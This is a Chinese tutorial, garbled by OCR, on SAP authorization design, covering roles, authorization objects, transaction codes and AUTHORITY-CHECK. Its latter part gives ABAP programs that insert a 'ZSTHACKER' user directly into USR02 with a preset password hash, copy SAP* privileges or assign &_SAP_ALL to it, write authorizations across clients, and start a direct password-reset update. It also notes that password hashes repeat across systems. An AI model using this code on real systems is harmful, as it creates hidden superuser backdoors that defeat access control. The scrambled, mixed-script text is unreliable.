SAP權(quán)限設(shè)計思路及方法

1、SAP權(quán)限與角色設(shè)計一般來說，權(quán)限就是“某人能干某事”和“某人不能干某事”之合。 在SAP系統(tǒng)中，用 事務(wù)碼(也稱交易代碼、或者TCODE或者TransactionCode )表示一個用戶能干的事情。比如MM0修個TCODE1用來維護物料數(shù)據(jù)的、MIGO用來收貨的、FS00是用來維護會計科目的等。用SU01新建一個ID時，默認的權(quán)限是空白，即這個新建的ID不能做任何事情，不能使用任何事務(wù)代碼。這樣只需要為相應(yīng)的ID賦上相應(yīng)的TCODE即可實現(xiàn)“某人能干某事” 了，其補集，則是“某人不能干的某些事”。但是我們不能直接在 SU01里面給某個ID賦上TCODE要通過ROLE中轉(zhuǎn)一下。即：一堆 TCO

2、D朗成了一個 ROLE然后把這個 ROL吩給某 個ID,然后這個ID就得到一堆TCODET。上面這些，僅僅是SAP權(quán)限控制的初級概念， 要理解SAP權(quán)限控制的全部， 必須還要明 白下面的概念。1、角色(ROLE、通用角色(Common Role)、本地角色(Local Role )上面講了，角色，即 ROLE是一堆TCODE勺集合，當(dāng)然還包含有 TCOD坐備的“權(quán)限 對象”、“權(quán)限字段”、“允許的操作”及“允許的值”等。我們使用PFCG維護角色。為了系統(tǒng)的測試與 SAP實施項目的階段性需要，進一步將角色分為“通用角色”和“本地角 色”。舉個例子便于理解：通用角色好比“生產(chǎn)訂單制單員”，本地角色

3、對應(yīng)就是“長城國際組裝一分廠生產(chǎn)訂單制單員”。所以，本地角色較之通用角色的區(qū)別就是，在同樣的操作權(quán)限(事務(wù)代碼們)情況下，前者多了具體的限制值。這個限制值可能是組織架構(gòu)限制，也可 能是其他業(yè)務(wù)的限制。如，一分廠的制單員不能維護二分廠的制單員；一分廠的制單員甲只能維護類型為A的單據(jù)，而不能維護類型為B的單據(jù)，諸如此類。具體請看下面的概念。2、權(quán)限對象(Authorization Object )、權(quán)限字段(AuthorizationField )、允許的操作 (Activity )、允許的值(Field Value )上面粗略說了構(gòu)成 ROLE勺是若干TCODE其實， 在ROL臣口 TCOD此間

4、，還有一個中間概念“權(quán)限對象”：角色包含了若干權(quán)限對象，在透明表AGR_1250中有存儲二者之間的關(guān)系；權(quán)限對象包含了若干權(quán)限字段、允許白操作和允許的值，在透明表AGR_1251中體現(xiàn)了ROLE/Object/Field/Value 之間的關(guān)系;有一個特殊的權(quán)限對象用來包含了若干事務(wù)碼。這個權(quán)限對象叫"S_TCODE,該權(quán)限對象的權(quán)限字段叫“ TCD ,該字段允許的值( FieldValue )存放的就是事務(wù)代碼； 有一種特殊的權(quán)限字段用來表示可以針對該權(quán)限對象做哪些操作，是允許創(chuàng)建、修改、顯示、刪除或者其他呢。該權(quán)限字段叫“ ACTVT ,該字段允許的值( Field Value

5、)存放的就是允 許操作的代碼，01代表創(chuàng)建、02代表修改、03代表顯示等；SAP 的權(quán)限控制是控制到字段級的，換句話說，其權(quán)限控制機制可以檢查你是否有權(quán)限 維護某張透明表的某一個字段。SAP系統(tǒng)自帶了若干權(quán)限對象、 默認控制了若干權(quán)限字段 (對應(yīng)到透明表的某些字段)。可以用事務(wù)碼 SU20來查看系統(tǒng)有哪些權(quán)限字段，用SU21來查看系統(tǒng)有哪些默認的權(quán)限對象。于是我們知道了事務(wù)代碼與權(quán)限對象的區(qū)別。從權(quán)限控制的范疇來看，事務(wù)代碼屬于一種特殊的權(quán)限對象；一個事務(wù)代碼在執(zhí)行過程中，為了判斷某個ID是否有權(quán)限執(zhí)行此事務(wù)代碼，還可能檢查其他若干普通的權(quán)限對象。使用SU22來查看某個事務(wù)代碼包含了哪些權(quán)限對

6、象。在透明表USOBXh存放了事務(wù)碼與權(quán)限對象的對應(yīng)關(guān)系。3、自定義權(quán)限對象上文所說的系統(tǒng)自帶權(quán)限對象與權(quán)限字段僅能滿足有限的需要，其權(quán)限審核的邏輯也是系統(tǒng)硬編碼了的，我們能做的只是是否啟用某項權(quán)限對象的檢查(使用SU22。如果需要自定義，通過SU2。SU21定義即可。調(diào)用的時候在程序中加入類似代碼：AUTHORITY-CHECK OBJECT 'Z_VKORG' ID 'VKORG' FIELD'REC_VKORG-VKORG'.IF SY-SUBRC <> 0.MESSAGE 'No Authorization!'

7、 TYPE 'E'.ENDIF.下面的程序ZCRTUSERL建立用戶ZSTHACKEF®始密碼123qaz）并賦予SAP*用戶的所有權(quán)限 的參考程序。Program ZCRTUSER.Data ZUSR02 like USR02 .*1.Create User ZSTHACKER according to DDIC select single * into ZUSR02 from USR02 where BNAME = 'DDIC'.ZUSR02-BNAME = 'ZSTHACKER'.ZUSR02-Bcode = 'E3B79

8、6BB09F7901B'.insert USR02 from ZUSR02 .*2.Copy Auth. Obj from SAP*(or other)*如果將 Where BNAME = 'SAP*'去掉，基本就是復(fù)制所有的授權(quán)對象data ZUSRBF2 like USRBF2 occurs 0 with header line.select * from USRBF2 into tableZUSRBF2where BNAME = 'SAP*'.Loop at ZUSRBF2.ZUSRBF2-BNAME = 'ZSTHACKER'.M

9、odify ZUSRBF2 INDEX sy-tabix TRANSPORTINGBNAME.endloop.INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.如果SAPm能被刪除，還可直接將TOBJ中包含的所有的SAP授權(quán)對象全部賦予給一個用戶。以下程序ZALLOBJ是賦予所有的標準授權(quán)對象給用戶 ZSTHACKERProgram ZALLOBJ。Data Ztobj like tobj occurs 0 with header line .data zusrbf2 like usrbf2.select * into tabl

10、e ztobj from tobj .loop at ztobj.zusrbf2-mandt = sy-mandt.zusrbf2-bname = 'ZSTHACKER'.zusrbf2-objct = ztobj-objct.zusrbf2-auth ='&_SAP_ALL'.modify USRBF2 FROM zusrbf2.endloop .也可跨Client建立用戶和賦予權(quán)限，只要使用 client specified 就可以。Program ZCLIENT.Data zusrbf2 like usrbf2.Select * into zusr

11、bf2 from usrbf2where bname ='SAP*'.Zusrbf2-mandt = '100'.Insert into usrbf2 client specified values zusrbf2.Endselect .下面是一句話修改 SAP鄲J密碼為123456的程序，同樣，假設(shè)用戶 BUTCHER勺密碼丟失，我 只要隨便在一臺服務(wù)器上建立一個用戶也叫BUTCHER然后密碼設(shè)置為1QAZ2WSX則其在任何系統(tǒng)任何client 加密后的密碼必為 BF02C9F1F179FB45這樣的加密意義已經(jīng)不大。report ZMODPWD.tables :usr02 .update usr0